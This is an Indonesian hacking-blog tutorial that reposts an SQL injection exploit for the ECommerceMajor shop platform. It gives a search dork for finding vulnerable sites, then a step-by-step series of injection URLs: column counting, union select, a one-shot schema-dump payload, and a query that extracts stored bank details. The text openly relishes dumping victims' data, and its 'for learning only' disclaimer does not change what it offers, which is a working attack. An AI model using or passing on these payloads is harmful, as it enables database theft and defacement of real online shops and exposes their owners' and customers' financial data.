Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Website dengan eXploit ECommerceMajor SQL Injection Vulnerability.
cielahh kalo baca/ denger kata yang berbau E-Commerce biasanya para kardiman pada merapat nih awkkw.
yoi E Commerce Major ini salah satu platforms utk online business, kemungkinan besar semua website online shop :D
hadeh dump dump dump akwkkakw.
Happy Injector, kuy langsung disimak.
#Exploit Author : Rahul Pratap Singh
#Date : 13/Dec/2015
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
Dork : inurl:/productdtl.php site:.
eXploit : productdtl.php?prodid=<SQLI>
Setelah kita mendapatkan target, lakukan tes untuk mengetahui vuln atau tidak menggunakan ‘
contoh : 127.0.0.1/productdtl.php?prodid=1’
2. coba kita balance dengan +--+
contoh : 127.0.0.1/productdtl.php?prodid=1+--+
3. jika halaman menjadi seperti semula, berarti balance sukses
coba kita menghitung jumlah column nya dengan menggunakan order by
contoh :
127.0.0.1/productdtl.php?prodid=1+order+by+1--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+2--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+3--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+10--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+11--+ → error, berarti jumlah columnnya 10.
sekarang kita cari angka ajaibnya menggunakan union select
contoh :
127.0.0.1/productdtl.php?prodid=-1+union+select+1,2,3,4,5,6,7,8,9,10--+
4. nah angka ajaibnya muncul, sekarang kita dump menggunakan DIOS nya mas madblood
contoh: 127.0.0.1/productdtl.php?prodid=1+productdtl.php?prodid=-2+union+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10--+
5. nah muncul kan? Tuh liat ada data bank juga xixixixi
sekarang kita coba dump lagi data datanya xixixix
contoh :
127.0.0.1/productdtl.php?prodid=-2+union+select+1,group_concat(bnk_title,0x3a,bnk_name,0x3a,bnk_br,0x3a,bnk_city),3,4,5,6,7,8,9,10 from cp_info--+
tuh keluarkan data datanya? Xixixix
Artikel Tutorial yang ada diBlog ini hanya untuk pembelajaran ya kak, jadi segala perbuatan yang Lu lakukan, semua di tanggung sang pembaca.
Kami tidak bertanggung jawab setidikpun, kami Hanya membantu para pembaca yang pemula seperti kami, jadi jangan banyakin Drama gak jelas wkwkwk.
Kalo ada pertanyaan silahkan ke fanspage atau Official Account Line kami.
happy hacking SQL Injection guys :)
3xBitCh
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
0 komentar:
Posting Komentar